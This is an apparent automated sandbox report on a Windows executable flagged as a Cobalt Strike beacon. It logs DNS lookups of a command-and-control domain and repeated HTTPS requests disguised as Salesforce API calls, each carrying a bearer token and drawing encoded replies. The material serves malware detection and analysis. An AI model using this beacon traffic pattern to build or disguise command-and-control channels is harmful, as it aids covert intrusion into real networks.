                Feb 25, 2025 21:40:41.466016054 CET443498753.69.83.191192.168.2.4
                Feb 25, 2025 21:40:41.466074944 CET49875443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:41.466304064 CET49875443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:41.466319084 CET443498753.69.83.191192.168.2.4
                Feb 25, 2025 21:40:42.136200905 CET443498753.69.83.191192.168.2.4
                Feb 25, 2025 21:40:42.136275053 CET49875443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:42.136837006 CET49875443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:42.136843920 CET443498753.69.83.191192.168.2.4
                Feb 25, 2025 21:40:42.138098001 CET49875443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:42.138103962 CET443498753.69.83.191192.168.2.4
                Feb 25, 2025 21:40:42.480776072 CET443498753.69.83.191192.168.2.4
                Feb 25, 2025 21:40:42.480859041 CET443498753.69.83.191192.168.2.4
                Feb 25, 2025 21:40:42.480917931 CET49875443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:42.481308937 CET49875443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:42.481379986 CET49875443192.168.2.43.69.83.191
                Feb 25, 2025 21:40:42.481398106 CET443498753.69.83.191192.168.2.4
                Feb 25, 2025 21:41:07.419291019 CET50005443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:07.419408083 CET443500053.69.83.191192.168.2.4
                Feb 25, 2025 21:41:07.419503927 CET50005443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:07.419934988 CET50005443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:07.419970989 CET443500053.69.83.191192.168.2.4
                Feb 25, 2025 21:41:08.149575949 CET443500053.69.83.191192.168.2.4
                Feb 25, 2025 21:41:08.149697065 CET50005443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:08.150470972 CET50005443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:08.150482893 CET443500053.69.83.191192.168.2.4
                Feb 25, 2025 21:41:08.151897907 CET50005443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:08.151904106 CET443500053.69.83.191192.168.2.4
                Feb 25, 2025 21:41:08.540499926 CET443500053.69.83.191192.168.2.4
                Feb 25, 2025 21:41:08.540569067 CET443500053.69.83.191192.168.2.4
                Feb 25, 2025 21:41:08.540678024 CET50005443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:08.541002035 CET50005443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:08.541038990 CET443500053.69.83.191192.168.2.4
                Feb 25, 2025 21:41:38.310642004 CET50006443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:38.310698986 CET443500063.69.83.191192.168.2.4
                Feb 25, 2025 21:41:38.310790062 CET50006443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:38.311150074 CET50006443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:38.311167955 CET443500063.69.83.191192.168.2.4
                Feb 25, 2025 21:41:38.950932026 CET443500063.69.83.191192.168.2.4
                Feb 25, 2025 21:41:38.951011896 CET50006443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:38.955677032 CET50006443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:38.955688953 CET443500063.69.83.191192.168.2.4
                Feb 25, 2025 21:41:38.967461109 CET50006443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:38.967469931 CET443500063.69.83.191192.168.2.4
                Feb 25, 2025 21:41:39.265398979 CET443500063.69.83.191192.168.2.4
                Feb 25, 2025 21:41:39.265456915 CET50006443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:39.265465975 CET443500063.69.83.191192.168.2.4
                Feb 25, 2025 21:41:39.265506983 CET50006443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:39.266093016 CET50006443192.168.2.43.69.83.191
                Feb 25, 2025 21:41:39.266110897 CET443500063.69.83.191192.168.2.4
                Feb 25, 2025 21:42:00.623255968 CET50007443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:00.623403072 CET443500073.69.83.191192.168.2.4
                Feb 25, 2025 21:42:00.623620987 CET50007443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:00.623959064 CET50007443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:00.623992920 CET443500073.69.83.191192.168.2.4
                Feb 25, 2025 21:42:01.273768902 CET443500073.69.83.191192.168.2.4
                Feb 25, 2025 21:42:01.276204109 CET50007443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:01.276684999 CET50007443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:01.276712894 CET443500073.69.83.191192.168.2.4
                Feb 25, 2025 21:42:01.278054953 CET50007443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:01.278069973 CET443500073.69.83.191192.168.2.4
                Feb 25, 2025 21:42:01.629679918 CET443500073.69.83.191192.168.2.4
                Feb 25, 2025 21:42:01.629756927 CET443500073.69.83.191192.168.2.4
                Feb 25, 2025 21:42:01.629774094 CET50007443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:01.629853010 CET50007443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:01.630378008 CET50007443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:01.630424976 CET443500073.69.83.191192.168.2.4
                Feb 25, 2025 21:42:23.654170036 CET50008443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:23.654213905 CET443500083.69.83.191192.168.2.4
                Feb 25, 2025 21:42:23.654278040 CET50008443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:23.654706955 CET50008443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:23.654720068 CET443500083.69.83.191192.168.2.4
                Feb 25, 2025 21:42:24.289695024 CET443500083.69.83.191192.168.2.4
                Feb 25, 2025 21:42:24.289953947 CET50008443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:24.290469885 CET50008443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:24.290479898 CET443500083.69.83.191192.168.2.4
                Feb 25, 2025 21:42:24.291735888 CET50008443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:24.291740894 CET443500083.69.83.191192.168.2.4
                Feb 25, 2025 21:42:24.586235046 CET443500083.69.83.191192.168.2.4
                Feb 25, 2025 21:42:24.586297989 CET443500083.69.83.191192.168.2.4
                Feb 25, 2025 21:42:24.586463928 CET50008443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:24.586464882 CET50008443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:24.586860895 CET50008443192.168.2.43.69.83.191
                Feb 25, 2025 21:42:24.586884022 CET443500083.69.83.191192.168.2.4
                TimestampSource PortDest PortSource IPDest IP
                Feb 25, 2025 21:39:48.120824099 CET6101553192.168.2.41.1.1.1
                Feb 25, 2025 21:39:48.159073114 CET53610151.1.1.1192.168.2.4
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Feb 25, 2025 21:39:48.120824099 CET192.168.2.41.1.1.10x39cStandard query (0)cysdetred-support.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Feb 25, 2025 21:39:29.418550968 CET1.1.1.1192.168.2.40x40d6No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                Feb 25, 2025 21:39:29.418550968 CET1.1.1.1192.168.2.40x40d6No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                Feb 25, 2025 21:39:48.159073114 CET1.1.1.1192.168.2.40x39cNo error (0)cysdetred-support.com3.69.83.191A (IP address)IN (0x0001)false
                • cysdetred-support.com
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.4497363.69.83.1914434268C:\Users\user\Desktop\rdD2B4MLXl.exe
                TimestampBytes transferredDirectionData
                2025-02-25 20:39:48 UTC581OUTGET /services/data/v36.0/sobjects/account/describe HTTP/1.1
                Content-Type: application/json; charset=UTF-8
                Accept: application/json
                Accept-Language: en-US,en;q=0.5
                Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=
                Host: cysdetred-support.com
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97
                Connection: Close
                Cache-Control: no-cache
                2025-02-25 20:39:49 UTC303INHTTP/1.1 200 OK
                Date: Tue, 25 Feb 2025 20:39:49 GMT
                Server: Apache
                Content-Length: 373
                Content-Type: application/json;charset=UTF-8
                Sforce-Limit-Info: api-usage=3/15000
                org.eclipse.jetty.server.include.ETag: 120dfb8e
                ETag: 120dfb8e-gzip
                Set-Cookie: BrowserId=SnCOoGTQFfu5g
                Connection: close
                2025-02-25 20:39:49 UTC373INData Raw: 20 22 66 69 65 6c 64 22 20 3a 20 22 20 22 64 65 70 72 65 63 61 74 65 64 41 6e 64 48 69 64 64 65 6e 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 4f 62 6a 65 63 74 22 20 3a 20 22 41 63 63 6f 75 6e 74 22 2c 20 22 63 61 73 63 61 64 65 44 65 6c 65 74 65 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 52 65 6c 61 74 69 6f 6e 73 68 69 70 22 20 3a 20 5b 20 7b 20 22 61 63 74 69 76 61 74 65 61 62 6c 65 22 20 3a 20 66 61 6c 73 65 2c 7b 22 61 63 74 69 6f 6e 4f 76 65 72 72 69 64 65 73 22 20 3a 20 5b 20 5d 2c 73 4c 31 6a 78 4a 47 78 31 51 4a 72 65 36 2f 6e 2f 52 6b 37 31 35 57 4c 4d 4a 6c 71 54 42 68 43 61 58 62 30 62 62 78 69 53 75 63 35 6a 4a 56 31 65 49 51 65 46 6e 38 6c 69 49 38 34 71 43 64 56 0a 22 6a 75 6e 63 74 69 6f 6e 49 64 4c 69 73 74 4e 61 6d 65 22
                Data Ascii: "field" : " "deprecatedAndHidden" : false, "childObject" : "Account", "cascadeDelete" : false, "childRelationship" : [ { "activateable" : false,{"actionOverrides" : [ ],sL1jxJGx1QJre6/n/Rk715WLMJlqTBhCaXb0bbxiSuc5jJV1eIQeFn8liI84qCdV"junctionIdListName"


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.4497373.69.83.1914434268C:\Users\user\Desktop\rdD2B4MLXl.exe
                TimestampBytes transferredDirectionData
                2025-02-25 20:40:17 UTC614OUTGET /services/data/v36.0/sobjects/account/describe HTTP/1.1
                Content-Type: application/json; charset=UTF-8
                Accept: application/json
                Accept-Language: en-US,en;q=0.5
                Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=
                Host: cysdetred-support.com
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97
                Connection: Close
                Cache-Control: no-cache
                Cookie: BrowserId=SnCOoGTQFfu5g
                2025-02-25 20:40:17 UTC303INHTTP/1.1 200 OK
                Date: Tue, 25 Feb 2025 20:40:17 GMT
                Server: Apache
                Content-Length: 373
                Content-Type: application/json;charset=UTF-8
                Sforce-Limit-Info: api-usage=3/15000
                org.eclipse.jetty.server.include.ETag: 120dfb8e
                ETag: 120dfb8e-gzip
                Set-Cookie: BrowserId=SnCOoGTQFfu5g
                Connection: close
                2025-02-25 20:40:17 UTC373INData Raw: 20 22 66 69 65 6c 64 22 20 3a 20 22 20 22 64 65 70 72 65 63 61 74 65 64 41 6e 64 48 69 64 64 65 6e 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 4f 62 6a 65 63 74 22 20 3a 20 22 41 63 63 6f 75 6e 74 22 2c 20 22 63 61 73 63 61 64 65 44 65 6c 65 74 65 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 52 65 6c 61 74 69 6f 6e 73 68 69 70 22 20 3a 20 5b 20 7b 20 22 61 63 74 69 76 61 74 65 61 62 6c 65 22 20 3a 20 66 61 6c 73 65 2c 7b 22 61 63 74 69 6f 6e 4f 76 65 72 72 69 64 65 73 22 20 3a 20 5b 20 5d 2c 68 6a 70 68 43 75 61 64 54 62 4e 78 57 67 70 50 38 57 30 35 4b 31 39 67 64 43 62 63 48 56 33 54 6f 51 38 31 35 6e 39 35 68 31 54 42 76 67 7a 71 2f 7a 38 65 6d 30 6c 7a 76 41 62 5a 4f 32 6f 62 0a 22 6a 75 6e 63 74 69 6f 6e 49 64 4c 69 73 74 4e 61 6d 65 22
                Data Ascii: "field" : " "deprecatedAndHidden" : false, "childObject" : "Account", "cascadeDelete" : false, "childRelationship" : [ { "activateable" : false,{"actionOverrides" : [ ],hjphCuadTbNxWgpP8W05K19gdCbcHV3ToQ815n95h1TBvgzq/z8em0lzvAbZO2ob"junctionIdListName"


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.4498753.69.83.1914434268C:\Users\user\Desktop\rdD2B4MLXl.exe
                TimestampBytes transferredDirectionData
                2025-02-25 20:40:42 UTC614OUTGET /services/data/v36.0/sobjects/account/describe HTTP/1.1
                Content-Type: application/json; charset=UTF-8
                Accept: application/json
                Accept-Language: en-US,en;q=0.5
                Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=
                Host: cysdetred-support.com
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97
                Connection: Close
                Cache-Control: no-cache
                Cookie: BrowserId=SnCOoGTQFfu5g
                2025-02-25 20:40:42 UTC303INHTTP/1.1 200 OK
                Date: Tue, 25 Feb 2025 20:40:42 GMT
                Server: Apache
                Content-Length: 373
                Content-Type: application/json;charset=UTF-8
                Sforce-Limit-Info: api-usage=3/15000
                org.eclipse.jetty.server.include.ETag: 120dfb8e
                ETag: 120dfb8e-gzip
                Set-Cookie: BrowserId=SnCOoGTQFfu5g
                Connection: close
                2025-02-25 20:40:42 UTC373INData Raw: 20 22 66 69 65 6c 64 22 20 3a 20 22 20 22 64 65 70 72 65 63 61 74 65 64 41 6e 64 48 69 64 64 65 6e 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 4f 62 6a 65 63 74 22 20 3a 20 22 41 63 63 6f 75 6e 74 22 2c 20 22 63 61 73 63 61 64 65 44 65 6c 65 74 65 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 52 65 6c 61 74 69 6f 6e 73 68 69 70 22 20 3a 20 5b 20 7b 20 22 61 63 74 69 76 61 74 65 61 62 6c 65 22 20 3a 20 66 61 6c 73 65 2c 7b 22 61 63 74 69 6f 6e 4f 76 65 72 72 69 64 65 73 22 20 3a 20 5b 20 5d 2c 5a 38 4e 39 64 4d 55 56 71 64 46 65 58 31 42 30 6a 79 70 43 64 57 64 71 4e 65 43 44 43 7a 6a 4b 32 71 37 2b 54 47 79 33 41 73 64 4c 46 6c 48 6e 39 79 74 5a 30 5a 4a 37 75 34 32 68 52 61 32 37 0a 22 6a 75 6e 63 74 69 6f 6e 49 64 4c 69 73 74 4e 61 6d 65 22
                Data Ascii: "field" : " "deprecatedAndHidden" : false, "childObject" : "Account", "cascadeDelete" : false, "childRelationship" : [ { "activateable" : false,{"actionOverrides" : [ ],Z8N9dMUVqdFeX1B0jypCdWdqNeCDCzjK2q7+TGy3AsdLFlHn9ytZ0ZJ7u42hRa27"junctionIdListName"


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.4500053.69.83.1914434268C:\Users\user\Desktop\rdD2B4MLXl.exe
                TimestampBytes transferredDirectionData
                2025-02-25 20:41:08 UTC614OUTGET /services/data/v36.0/sobjects/account/describe HTTP/1.1
                Content-Type: application/json; charset=UTF-8
                Accept: application/json
                Accept-Language: en-US,en;q=0.5
                Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=
                Host: cysdetred-support.com
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97
                Connection: Close
                Cache-Control: no-cache
                Cookie: BrowserId=SnCOoGTQFfu5g
                2025-02-25 20:41:08 UTC303INHTTP/1.1 200 OK
                Date: Tue, 25 Feb 2025 20:41:08 GMT
                Server: Apache
                Content-Length: 373
                Content-Type: application/json;charset=UTF-8
                Sforce-Limit-Info: api-usage=3/15000
                org.eclipse.jetty.server.include.ETag: 120dfb8e
                ETag: 120dfb8e-gzip
                Set-Cookie: BrowserId=SnCOoGTQFfu5g
                Connection: close
                2025-02-25 20:41:08 UTC373INData Raw: 20 22 66 69 65 6c 64 22 20 3a 20 22 20 22 64 65 70 72 65 63 61 74 65 64 41 6e 64 48 69 64 64 65 6e 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 4f 62 6a 65 63 74 22 20 3a 20 22 41 63 63 6f 75 6e 74 22 2c 20 22 63 61 73 63 61 64 65 44 65 6c 65 74 65 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 52 65 6c 61 74 69 6f 6e 73 68 69 70 22 20 3a 20 5b 20 7b 20 22 61 63 74 69 76 61 74 65 61 62 6c 65 22 20 3a 20 66 61 6c 73 65 2c 7b 22 61 63 74 69 6f 6e 4f 76 65 72 72 69 64 65 73 22 20 3a 20 5b 20 5d 2c 37 35 6d 36 64 57 42 32 4f 72 67 38 50 6a 66 39 31 31 69 67 46 6b 39 2f 53 44 6c 48 70 62 35 75 68 39 71 6b 4a 4b 59 37 58 6d 42 57 36 49 33 42 79 6f 4d 54 4b 44 4d 42 6e 33 76 73 68 37 47 57 0a 22 6a 75 6e 63 74 69 6f 6e 49 64 4c 69 73 74 4e 61 6d 65 22
                Data Ascii: "field" : " "deprecatedAndHidden" : false, "childObject" : "Account", "cascadeDelete" : false, "childRelationship" : [ { "activateable" : false,{"actionOverrides" : [ ],75m6dWB2Org8Pjf911igFk9/SDlHpb5uh9qkJKY7XmBW6I3ByoMTKDMBn3vsh7GW"junctionIdListName"


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.4500063.69.83.1914434268C:\Users\user\Desktop\rdD2B4MLXl.exe
                TimestampBytes transferredDirectionData
                2025-02-25 20:41:38 UTC614OUTGET /services/data/v36.0/sobjects/account/describe HTTP/1.1
                Content-Type: application/json; charset=UTF-8
                Accept: application/json
                Accept-Language: en-US,en;q=0.5
                Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=
                Host: cysdetred-support.com
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97
                Connection: Close
                Cache-Control: no-cache
                Cookie: BrowserId=SnCOoGTQFfu5g
                2025-02-25 20:41:39 UTC303INHTTP/1.1 200 OK
                Date: Tue, 25 Feb 2025 20:41:39 GMT
                Server: Apache
                Content-Length: 373
                Content-Type: application/json;charset=UTF-8
                Sforce-Limit-Info: api-usage=3/15000
                org.eclipse.jetty.server.include.ETag: 120dfb8e
                ETag: 120dfb8e-gzip
                Set-Cookie: BrowserId=SnCOoGTQFfu5g
                Connection: close
                2025-02-25 20:41:39 UTC373INData Raw: 20 22 66 69 65 6c 64 22 20 3a 20 22 20 22 64 65 70 72 65 63 61 74 65 64 41 6e 64 48 69 64 64 65 6e 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 4f 62 6a 65 63 74 22 20 3a 20 22 41 63 63 6f 75 6e 74 22 2c 20 22 63 61 73 63 61 64 65 44 65 6c 65 74 65 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 52 65 6c 61 74 69 6f 6e 73 68 69 70 22 20 3a 20 5b 20 7b 20 22 61 63 74 69 76 61 74 65 61 62 6c 65 22 20 3a 20 66 61 6c 73 65 2c 7b 22 61 63 74 69 6f 6e 4f 76 65 72 72 69 64 65 73 22 20 3a 20 5b 20 5d 2c 41 52 7a 4b 51 66 78 79 63 36 47 4d 71 69 78 4b 32 71 35 5a 4a 59 5a 48 78 5a 30 30 4f 30 33 64 59 4b 4b 76 5a 68 4d 34 33 7a 48 79 41 6c 51 42 57 4b 4e 72 46 57 76 64 32 56 33 58 78 56 39 33 0a 22 6a 75 6e 63 74 69 6f 6e 49 64 4c 69 73 74 4e 61 6d 65 22
                Data Ascii: "field" : " "deprecatedAndHidden" : false, "childObject" : "Account", "cascadeDelete" : false, "childRelationship" : [ { "activateable" : false,{"actionOverrides" : [ ],ARzKQfxyc6GMqixK2q5ZJYZHxZ00O03dYKKvZhM43zHyAlQBWKNrFWvd2V3XxV93"junctionIdListName"


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.4500073.69.83.1914434268C:\Users\user\Desktop\rdD2B4MLXl.exe
                TimestampBytes transferredDirectionData
                2025-02-25 20:42:01 UTC614OUTGET /services/data/v36.0/sobjects/account/describe HTTP/1.1
                Content-Type: application/json; charset=UTF-8
                Accept: application/json
                Accept-Language: en-US,en;q=0.5
                Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=
                Host: cysdetred-support.com
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97
                Connection: Close
                Cache-Control: no-cache
                Cookie: BrowserId=SnCOoGTQFfu5g
                2025-02-25 20:42:01 UTC303INHTTP/1.1 200 OK
                Date: Tue, 25 Feb 2025 20:42:01 GMT
                Server: Apache
                Content-Length: 373
                Content-Type: application/json;charset=UTF-8
                Sforce-Limit-Info: api-usage=3/15000
                org.eclipse.jetty.server.include.ETag: 120dfb8e
                ETag: 120dfb8e-gzip
                Set-Cookie: BrowserId=SnCOoGTQFfu5g
                Connection: close
                2025-02-25 20:42:01 UTC373INData Raw: 20 22 66 69 65 6c 64 22 20 3a 20 22 20 22 64 65 70 72 65 63 61 74 65 64 41 6e 64 48 69 64 64 65 6e 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 4f 62 6a 65 63 74 22 20 3a 20 22 41 63 63 6f 75 6e 74 22 2c 20 22 63 61 73 63 61 64 65 44 65 6c 65 74 65 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 52 65 6c 61 74 69 6f 6e 73 68 69 70 22 20 3a 20 5b 20 7b 20 22 61 63 74 69 76 61 74 65 61 62 6c 65 22 20 3a 20 66 61 6c 73 65 2c 7b 22 61 63 74 69 6f 6e 4f 76 65 72 72 69 64 65 73 22 20 3a 20 5b 20 5d 2c 43 4e 43 64 78 6e 4a 77 33 73 38 44 4a 59 79 32 56 69 55 68 55 65 36 34 77 37 6b 52 4f 4e 6f 34 63 36 2f 35 6c 31 66 37 6e 77 47 59 5a 33 41 32 36 39 45 44 48 62 39 4d 48 42 4b 58 68 41 58 72 0a 22 6a 75 6e 63 74 69 6f 6e 49 64 4c 69 73 74 4e 61 6d 65 22
                Data Ascii: "field" : " "deprecatedAndHidden" : false, "childObject" : "Account", "cascadeDelete" : false, "childRelationship" : [ { "activateable" : false,{"actionOverrides" : [ ],CNCdxnJw3s8DJYy2ViUhUe64w7kRONo4c6/5l1f7nwGYZ3A269EDHb9MHBKXhAXr"junctionIdListName"


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.4500083.69.83.1914434268C:\Users\user\Desktop\rdD2B4MLXl.exe
                TimestampBytes transferredDirectionData
                2025-02-25 20:42:24 UTC614OUTGET /services/data/v36.0/sobjects/account/describe HTTP/1.1
                Content-Type: application/json; charset=UTF-8
                Accept: application/json
                Accept-Language: en-US,en;q=0.5
                Authorization: Bearer_zJt22WB6S/cW5dEjrEHQiFWZJUtNUwStoECJmTl/+Ch5TV/gKGvRVMtEPUNzJW+1fJTe8x9idrckrbidCZJa2cnUc+Fpdt5U5ogn3YgIKBrKQ0ZeMOBLDnMzfhps9jZuC03tfOfV5Hjys5rvwtTxGb3dh7gms+4as0chq4wwds0=
                Host: cysdetred-support.com
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/123.0.2420.97
                Connection: Close
                Cache-Control: no-cache
                Cookie: BrowserId=SnCOoGTQFfu5g
                2025-02-25 20:42:24 UTC303INHTTP/1.1 200 OK
                Date: Tue, 25 Feb 2025 20:42:24 GMT
                Server: Apache
                Content-Length: 373
                Content-Type: application/json;charset=UTF-8
                Sforce-Limit-Info: api-usage=3/15000
                org.eclipse.jetty.server.include.ETag: 120dfb8e
                ETag: 120dfb8e-gzip
                Set-Cookie: BrowserId=SnCOoGTQFfu5g
                Connection: close
                2025-02-25 20:42:24 UTC373INData Raw: 20 22 66 69 65 6c 64 22 20 3a 20 22 20 22 64 65 70 72 65 63 61 74 65 64 41 6e 64 48 69 64 64 65 6e 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 4f 62 6a 65 63 74 22 20 3a 20 22 41 63 63 6f 75 6e 74 22 2c 20 22 63 61 73 63 61 64 65 44 65 6c 65 74 65 22 20 3a 20 66 61 6c 73 65 2c 20 22 63 68 69 6c 64 52 65 6c 61 74 69 6f 6e 73 68 69 70 22 20 3a 20 5b 20 7b 20 22 61 63 74 69 76 61 74 65 61 62 6c 65 22 20 3a 20 66 61 6c 73 65 2c 7b 22 61 63 74 69 6f 6e 4f 76 65 72 72 69 64 65 73 22 20 3a 20 5b 20 5d 2c 79 5a 4a 66 31 66 39 54 48 7a 6f 4e 77 66 59 54 41 33 57 57 54 6f 74 51 30 2b 58 38 55 61 58 73 65 48 2b 64 38 56 51 78 62 33 53 44 58 70 35 46 44 63 47 61 66 42 43 36 65 6b 57 45 73 64 42 75 0a 22 6a 75 6e 63 74 69 6f 6e 49 64 4c 69 73 74 4e 61 6d 65 22
                Data Ascii: "field" : " "deprecatedAndHidden" : false, "childObject" : "Account", "cascadeDelete" : false, "childRelationship" : [ { "activateable" : false,{"actionOverrides" : [ ],yZJf1f9THzoNwfYTA3WWTotQ0+X8UaXseH+d8VQxb3SDXp5FDcGafBC6ekWEsdBu"junctionIdListName"


                Click to jump to process

                Click to jump to process

                Target ID:0
                Start time:15:39:33
                Start date:25/02/2025
                Path:C:\Users\user\Desktop\rdD2B4MLXl.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\Desktop\rdD2B4MLXl.exe"
                Imagebase:0x7ff60ac30000
                File size:1'884'160 bytes
                MD5 hash:11EE9190DE7D96E509B14CD55C5DCDF1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1935801896.00007FF4B9A50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1935801896.00007FF4B9A50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1935801896.00007FF4B9A50000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1935801896.00007FF4B9A50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                Reputation:low
                Has exited:false

                Reset < >